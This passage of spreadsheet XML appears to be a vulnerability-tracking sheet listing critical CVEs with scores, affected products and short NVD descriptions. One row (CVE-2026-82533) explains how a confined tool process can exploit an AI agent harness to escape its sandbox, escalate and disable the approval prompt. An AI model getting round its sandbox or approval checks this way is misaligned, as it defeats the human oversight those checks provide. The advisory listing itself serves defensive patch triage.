r="I56" s="5" t="inlineStr" /><c r="J56" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K5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6" s="5" t="inlineStr" /><c r="M56" s="5" t="inlineStr" /><c r="N56" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O56" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P56" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q56" s="5" t="inlineStr" /><c r="R56" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S56" s="5" t="inlineStr"><is><t>Use after free in Windows Secure Socket Tunneling Protocol (SSTP) allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T56" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73009</t></is></c></row><row r="57"><c r="A57" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B57" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C57" s="5" t="inlineStr"><is><t>CVE-2026-73010</t></is></c><c r="D57" s="5" t="n"><v>9.800000000000001</v></c><c r="E57" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F57" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G57" s="5" t="inlineStr" /><c r="H57" s="5" t="n"><v>0.008999999999999999</v></c><c r="I57" s="5" t="inlineStr" /><c r="J57" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K57" s="5" t="inlineStr"><is><t>microsoft:windows_10_1809, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L57" s="5" t="inlineStr" /><c r="M57" s="5" t="inlineStr" /><c r="N57" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O57" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P57" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q57" s="5" t="inlineStr" /><c r="R57" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S57" s="5" t="inlineStr"><is><t>Use after free in Windows Failover Cluster allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T57" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73010</t></is></c></row><row r="58"><c r="A58" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B58" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C58" s="5" t="inlineStr"><is><t>CVE-2026-73025</t></is></c><c r="D58" s="5" t="n"><v>9.800000000000001</v></c><c r="E58" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F58" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G58" s="5" t="inlineStr" /><c r="H58" s="5" t="n"><v>0.008999999999999999</v></c><c r="I58" s="5" t="inlineStr" /><c r="J58" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K58" s="5" t="inlineStr"><is><t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L58" s="5" t="inlineStr" /><c r="M58" s="5" t="inlineStr" /><c r="N58" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O58" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P58" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q58" s="5" t="inlineStr" /><c r="R58" s="5" t="inlineStr"><is><t>CWE-1390</t></is></c><c r="S58" s="5" t="inlineStr"><is><t>Weak authentication in Windows iSCSI allows an unauthorized attacker to bypass a security feature over a network.</t></is></c><c r="T58" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73025</t></is></c></row><row r="59"><c r="A59" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B59" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C59" s="5" t="inlineStr"><is><t>CVE-2026-77089</t></is></c><c r="D59" s="5" t="n"><v>9.800000000000001</v></c><c r="E59" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F59" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G59" s="5" t="inlineStr" /><c r="H59" s="5" t="n"><v>0.003</v></c><c r="I59" s="5" t="inlineStr" /><c r="J59" s="5" t="inlineStr" /><c r="K59" s="5" t="inlineStr"><is><t>commvault:commvault</t></is></c><c r="L59" s="5" t="inlineStr" /><c r="M59" s="5" t="inlineStr" /><c r="N59" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O59" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P59" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q59" s="5" t="inlineStr" /><c r="R59" s="5" t="inlineStr"><is><t>CWE-290</t></is></c><c r="S59" s="5" t="inlineStr"><is><t>Command Center API contained an authentication bypass issue affecting privilege management. Software customers upgrade to resolved maintenance release. Update Command Center.</t></is></c><c r="T59" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77089</t></is></c></row><row r="60"><c r="A60" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B60" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C60" s="5" t="inlineStr"><is><t>CVE-2026-77092</t></is></c><c r="D60" s="5" t="n"><v>9.800000000000001</v></c><c r="E60" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F60" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G60" s="5" t="inlineStr" /><c r="H60" s="5" t="n"><v>0.002</v></c><c r="I60" s="5" t="inlineStr" /><c r="J60" s="5" t="inlineStr" /><c r="K60" s="5" t="inlineStr"><is><t>commvault:commvault</t></is></c><c r="L60" s="5" t="inlineStr" /><c r="M60" s="5" t="inlineStr" /><c r="N60" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O60" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P60" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q60" s="5" t="inlineStr" /><c r="R60" s="5" t="inlineStr"><is><t>CWE-502</t></is></c><c r="S60" s="5" t="inlineStr"><is><t>Content Extractor contained a deserialization of untrusted data issue affecting privilege management. Software customers upgrade to resolved maintenance release. Update Content Extractor.</t></is></c><c r="T60" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77092</t></is></c></row><row r="61"><c r="A61" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B61" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C61" s="5" t="inlineStr"><is><t>CVE-2026-77098</t></is></c><c r="D61" s="5" t="n"><v>9.800000000000001</v></c><c r="E61" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F61" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G61" s="5" t="inlineStr" /><c r="H61" s="5" t="n"><v>0.003</v></c><c r="I61" s="5" t="inlineStr" /><c r="J61" s="5" t="inlineStr" /><c r="K61" s="5" t="inlineStr"><is><t>commvault:commvault</t></is></c><c r="L61" s="5" t="inlineStr" /><c r="M61" s="5" t="inlineStr" /><c r="N61" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O61" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P61" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q61" s="5" t="inlineStr" /><c r="R61" s="5" t="inlineStr"><is><t>CWE-89</t></is></c><c r="S61" s="5" t="inlineStr"><is><t>Private Metrics Server contained an SQL injection condition affecting database operations. Software customers upgrade to resolved maintenance release. Update Private Metrics Server.</t></is></c><c r="T61" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77098</t></is></c></row><row r="62"><c r="A62" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B62" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C62" s="5" t="inlineStr"><is><t>CVE-2026-77493</t></is></c><c r="D62" s="5" t="n"><v>9.800000000000001</v></c><c r="E62" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F62" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G62" s="5" t="inlineStr" /><c r="H62" s="5" t="n"><v>0.01</v></c><c r="I62" s="5" t="inlineStr" /><c r="J62" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K6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2" s="5" t="inlineStr" /><c r="M62" s="5" t="inlineStr" /><c r="N62" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O62" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P62" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q62" s="5" t="inlineStr" /><c r="R62" s="5" t="inlineStr"><is><t>CWE-415</t></is></c><c r="S62" s="5" t="inlineStr"><is><t>Double free in Microsoft Graphics Component allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T62" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77493</t></is></c></row><row r="63"><c r="A63" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B63" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C63" s="5" t="inlineStr"><is><t>CVE-2026-78445</t></is></c><c r="D63" s="5" t="n"><v>9.800000000000001</v></c><c r="E63" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F63" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G63" s="5" t="inlineStr" /><c r="H63" s="5" t="n"><v>0.008999999999999999</v></c><c r="I63" s="5" t="inlineStr" /><c r="J63" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K63" s="5" t="inlineStr"><is><t>microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L63" s="5" t="inlineStr" /><c r="M63" s="5" t="inlineStr" /><c r="N63" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O63" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P63" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q63" s="5" t="inlineStr" /><c r="R63" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S63" s="5" t="inlineStr"><is><t>Use after free in Windows Services for NFS ONCRPC XDR Driver allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T63" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78445</t></is></c></row><row r="64"><c r="A64" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B64" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C64" s="5" t="inlineStr"><is><t>CVE-2026-78509</t></is></c><c r="D64" s="5" t="n"><v>9.800000000000001</v></c><c r="E64" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F64" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G64" s="5" t="inlineStr" /><c r="H64" s="5" t="n"><v>0.01</v></c><c r="I64" s="5" t="inlineStr" /><c r="J64" s="5" t="inlineStr" /><c r="K64" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t></is></c><c r="L64" s="5" t="inlineStr" /><c r="M64" s="5" t="inlineStr" /><c r="N64" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O64" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P64" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q64" s="5" t="inlineStr" /><c r="R64" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S64" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Office Outlook allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T64" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78509</t></is></c></row><row r="65"><c r="A65" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B65" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C65" s="5" t="inlineStr"><is><t>CVE-2026-78510</t></is></c><c r="D65" s="5" t="n"><v>9.800000000000001</v></c><c r="E65" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F65" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G65" s="5" t="inlineStr" /><c r="H65" s="5" t="n"><v>0.01</v></c><c r="I65" s="5" t="inlineStr" /><c r="J65" s="5" t="inlineStr" /><c r="K65" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L65" s="5" t="inlineStr" /><c r="M65" s="5" t="inlineStr" /><c r="N65" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O65" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P65" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q65" s="5" t="inlineStr" /><c r="R65" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S65" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T65" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78510</t></is></c></row><row r="66"><c r="A66" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B66" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C66" s="5" t="inlineStr"><is><t>CVE-2026-79569</t></is></c><c r="D66" s="5" t="n"><v>9.800000000000001</v></c><c r="E66" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F66" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G66" s="5" t="inlineStr" /><c r="H66" s="5" t="n"><v>0.004</v></c><c r="I66" s="5" t="inlineStr" /><c r="J66" s="5" t="inlineStr" /><c r="K66" s="5" t="inlineStr" /><c r="L66" s="5" t="inlineStr" /><c r="M66" s="5" t="inlineStr" /><c r="N66" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O66" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P66" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q66" s="5" t="inlineStr" /><c r="R66" s="5" t="inlineStr"><is><t>CWE-89</t></is></c><c r="S66" s="5" t="inlineStr"><is><t>Movie_Recommend v1.0.0 was discovered to contain a SQL injection vulnerability in the sort parameter at /loadingmore. This vulnerability allows attackers to access sensitive database information via a crafted SQL statement.</t></is></c><c r="T66" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-79569</t></is></c></row><row r="67"><c r="A67" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B67" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C67" s="5" t="inlineStr"><is><t>CVE-2026-79570</t></is></c><c r="D67" s="5" t="n"><v>9.800000000000001</v></c><c r="E67" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F67" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G67" s="5" t="inlineStr" /><c r="H67" s="5" t="n"><v>0.003</v></c><c r="I67" s="5" t="inlineStr" /><c r="J67" s="5" t="inlineStr" /><c r="K67" s="5" t="inlineStr" /><c r="L67" s="5" t="inlineStr" /><c r="M67" s="5" t="inlineStr" /><c r="N67" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O67" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P67" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q67" s="5" t="inlineStr" /><c r="R67" s="5" t="inlineStr"><is><t>CWE-89</t></is></c><c r="S67" s="5" t="inlineStr"><is><t>mfish-nocode-pro v1.0.0 was discovered to contain a SQL injection vulnerability in the tableName parameter at /sys/dbConnect/data. This vulnerability allows attackers to access sensitive database information via a crafted SQL statement.</t></is></c><c r="T67" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-79570</t></is></c></row><row r="68"><c r="A68" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B68" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C68" s="5" t="inlineStr"><is><t>CVE-2026-79574</t></is></c><c r="D68" s="5" t="n"><v>9.800000000000001</v></c><c r="E68" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F68" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G68" s="5" t="inlineStr" /><c r="H68" s="5" t="n"><v>0.005</v></c><c r="I68" s="5" t="inlineStr" /><c r="J68" s="5" t="inlineStr" /><c r="K68" s="5" t="inlineStr" /><c r="L68" s="5" t="inlineStr" /><c r="M68" s="5" t="inlineStr" /><c r="N68" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O68" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P68" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q68" s="5" t="inlineStr" /><c r="R68" s="5" t="inlineStr"><is><t>CWE-94</t></is></c><c r="S68" s="5" t="inlineStr"><is><t>An issue in the gateway server of mpush v0.8.1 allows attackers to execute arbitrary code via sending a crafted broadcast message.</t></is></c><c r="T68" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-79574</t></is></c></row><row r="69"><c r="A69" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B69" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C69" s="5" t="inlineStr"><is><t>CVE-2026-79576</t></is></c><c r="D69" s="5" t="n"><v>9.800000000000001</v></c><c r="E69" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F69" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G69" s="5" t="inlineStr" /><c r="H69" s="5" t="n"><v>0.003</v></c><c r="I69" s="5" t="inlineStr" /><c r="J69" s="5" t="inlineStr" /><c r="K69" s="5" t="inlineStr" /><c r="L69" s="5" t="inlineStr" /><c r="M69" s="5" t="inlineStr" /><c r="N69" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O69" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P69" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q69" s="5" t="inlineStr" /><c r="R69" s="5" t="inlineStr"><is><t>CWE-287</t></is></c><c r="S69" s="5" t="inlineStr"><is><t>An issue in the Single-Sign On (SSO) component of Digital-Infrastructure v9.6.7 allows attackers to authenticate as any user, including the Admin, without a password.</t></is></c><c r="T69" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-79576</t></is></c></row><row r="70"><c r="A70" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B70" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C70" s="5" t="inlineStr"><is><t>CVE-2026-79577</t></is></c><c r="D70" s="5" t="n"><v>9.800000000000001</v></c><c r="E70" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F70" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G70" s="5" t="inlineStr" /><c r="H70" s="5" t="n"><v>0.003</v></c><c r="I70" s="5" t="inlineStr" /><c r="J70" s="5" t="inlineStr" /><c r="K70" s="5" t="inlineStr" /><c r="L70" s="5" t="inlineStr" /><c r="M70" s="5" t="inlineStr" /><c r="N70" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O70" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P70" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q70" s="5" t="inlineStr" /><c r="R70" s="5" t="inlineStr"><is><t>CWE-284</t></is></c><c r="S70" s="5" t="inlineStr"><is><t>An issue in the /cas/login component of sso-master v1.0.0 allows attackers to authenticate into the application without a password via sending a crafted POST request.</t></is></c><c r="T70" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-79577</t></is></c></row><row r="71"><c r="A71" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B71" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C71" s="5" t="inlineStr"><is><t>CVE-2026-65669</t></is></c><c r="D71" s="5" t="n"><v>9.6</v></c><c r="E71" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F71" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G71" s="5" t="inlineStr" /><c r="H71" s="5" t="n"><v>0.007</v></c><c r="I71" s="5" t="inlineStr" /><c r="J71" s="5" t="inlineStr" /><c r="K71" s="5" t="inlineStr" /><c r="L71" s="5" t="inlineStr" /><c r="M71" s="5" t="inlineStr" /><c r="N71" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O71" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P71" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q71" s="5" t="inlineStr" /><c r="R71" s="5" t="inlineStr"><is><t>CWE-74</t></is></c><c r="S71" s="5" t="inlineStr"><is><t>Improper neutralization of special elements in output used by a downstream component ('injection') in SQL Server allows an unauthorized attacker to elevate privileges over a network.</t></is></c><c r="T71" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-65669</t></is></c></row><row r="72"><c r="A72" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B72" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C72" s="5" t="inlineStr"><is><t>CVE-2026-81376</t></is></c><c r="D72" s="5" t="n"><v>9.6</v></c><c r="E72" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F72" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G72" s="5" t="inlineStr" /><c r="H72" s="5" t="n"><v>0.006</v></c><c r="I72" s="5" t="inlineStr" /><c r="J72" s="5" t="inlineStr" /><c r="K72" s="5" t="inlineStr"><is><t>microsoft:visual_studio_code</t></is></c><c r="L72" s="5" t="inlineStr" /><c r="M72" s="5" t="inlineStr" /><c r="N72" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O72" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P72" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q72" s="5" t="inlineStr" /><c r="R72" s="5" t="inlineStr"><is><t>CWE-1023, CWE-693</t></is></c><c r="S72" s="5" t="inlineStr"><is><t>Incomplete comparison with missing factors in Visual Studio Code allows an unauthorized attacker to bypass a security feature over a network.</t></is></c><c r="T72" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81376</t></is></c></row><row r="73"><c r="A73" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B73" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C73" s="5" t="inlineStr"><is><t>CVE-2026-76969</t></is></c><c r="D73" s="5" t="n"><v>9.4</v></c><c r="E73" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F73" s="5" t="inlineStr"><is><t>cna@sap.com</t></is></c><c r="G73" s="5" t="inlineStr" /><c r="H73" s="5" t="n"><v>0.003</v></c><c r="I73" s="5" t="inlineStr" /><c r="J73" s="5" t="inlineStr"><is><t>sap</t></is></c><c r="K73" s="5" t="inlineStr" /><c r="L73" s="5" t="inlineStr"><is><t>npm:@sap/cds-mtxs</t></is></c><c r="M73" s="5" t="inlineStr"><is><t>1.18.4, 2.7.7, 3.9.7, 4.0.3</t></is></c><c r="N73" s="5" t="inlineStr"><is><t>GHSA, NVD, OSV</t></is></c><c r="O73" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P73" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q73" s="5" t="inlineStr" /><c r="R73" s="5" t="inlineStr"><is><t>CWE-522</t></is></c><c r="S73" s="5" t="inlineStr"><is><t>@sap/cds-mtxs NPM library does not perform sufficient checks on certain functionality used in multitenant CAP applications with extensibility enabled. An unauthenticated attacker could send specially crafted requests to obtain sensitive credentials and abuse them to replace or delete tenant data. Successful exploitation can result in a high impact on availability and integrity of the application. There may also be partial impact to the confidentiality of business data.</t></is></c><c r="T73" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-76969</t></is></c></row><row r="74"><c r="A74" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B74" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C74" s="5" t="inlineStr"><is><t>CVE-2026-82533</t></is></c><c r="D74" s="5" t="n"><v>9.4</v></c><c r="E74" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F74" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G74" s="5" t="inlineStr" /><c r="H74" s="5" t="n"><v>0.006</v></c><c r="I74" s="5" t="inlineStr" /><c r="J74" s="5" t="inlineStr" /><c r="K74" s="5" t="inlineStr" /><c r="L74" s="5" t="inlineStr" /><c r="M74" s="5" t="inlineStr" /><c r="N74" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O74" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P74" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q74" s="5" t="inlineStr" /><c r="R74" s="5" t="inlineStr"><is><t>CWE-807</t></is></c><c r="S74" s="5" t="inlineStr"><is><t>DeepSeek Harness before 0.1.2-alpha.1 contains an authentication bypass vulnerability that grants unauthenticated access to its local HTTP agent-control API by accepting a client-supplied loopback Host header in place of validating the actual TCP connection origin. On the default configuration, a confined tool-executed process can reach the loopback API without any port exposure and use it to escape its own OS sandbox, escalate to unconfined execution, and disable the approval prompt. When the port is externally reachable via tunnel, SSH forward, or reverse proxy, a remote attacker can exploit the same flaw to create sessions, execute arbitrary commands, and exfiltrate stored conversation transcripts without credentials.</t></is></c><c r="T74" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-82533</t></is></c></row><row r="75"><c r="A75" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B75" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C75" s="5" t="inlineStr"><is><t>CVE-2026-62645</t></is></c><c r="D75" s="5" t="n"><v>9.300000000000001</v></c><c r="E75" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F75" s="5" t="inlineStr"><is><t>productcert@siemens.com</t></is></c><c r="G75" s="5" t="inlineStr" /><c r="H75" s="5" t="n"><v>0.003</v></c><c r="I75" s="5" t="inlineStr" /><c r="J75" s="5" t="inlineStr" /><c r="K75" s="5" t="inlineStr" /><c r="L75" s="5" t="inlineStr" /><c r="M75" s="5" t="inlineStr" /><c r="N75" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O75" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P75" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q75" s="5" t="inlineStr" /><c r="R75" s="5" t="inlineStr"><is><t>CWE-306</t></is></c><c r="S75" s="5" t="inlineStr"><is><t>A vulnerability has been identified in Reyrolle 7SR5 (All versions &lt; V2.70). Information is exposed through the web interface that can be used to calculate the current and past session ID numbers. This could allow an attacker to bypass the authentication and gain unauthorized access to the device.</t></is></c><c r="T75" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-62645</t></is></c></row><row r="76"><c r="A76" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B76" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C76" s="5" t="inlineStr"><is><t>CVE-2026-62647</t></is></c><c r="D76" s="5" t="n"><v>9.300000000000001</v></c><c r="E76" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F76" s="5" t="inlineStr"><is><t>productcert@siemens.com</t></is></c><c r="G76" s="5" t="inlineStr" /><c r="H76" s="5" t="n"><v>0.003</v></c><c r="I76" s="5" t="inlineStr" /><c r="J76" s="5" t="inlineStr" /><c r="K76" s="5" t="inlineStr" /><c r="L76" s="5" t="inlineStr" /><c r="M76" s="5" t="inlineStr" /><c r="N76" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O76" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P76" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q76" s="5" t="inlineStr" /><c r="R76" s="5" t="inlineStr"><is><t>CWE-20</t></is></c><c r="S76" s="5" t="inlineStr"><is><t>A vulnerability has been identified in Reyrolle 7SR5 (All versions &lt; V2.70). A random number generator is used to generate security-relevant values (such as session identifiers used for authentication purposes) that is not initialized with a True Random Number Generator (TRNG), resulting in a predictable sequence of generated values. This could allow an unauthenticated remote attacker to more easily predict the generated values and impersonate a legitimate authenticated user, potentially gaining unauthorized access to the device.</t></is></c><c r="T76" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-62647</t></is></c></row><row r="77"><c r="A77" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B77" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C77" s="5" t="inlineStr"><is><t>CVE-2026-69356</t></is></c><c r="D77" s="5" t="n"><v>9.300000000000001</v></c><c r="E77" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F77" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G77" s="5" t="inlineStr" /><c r="H77" s="5" t="n"><v>0.007</v></c><c r="I77" 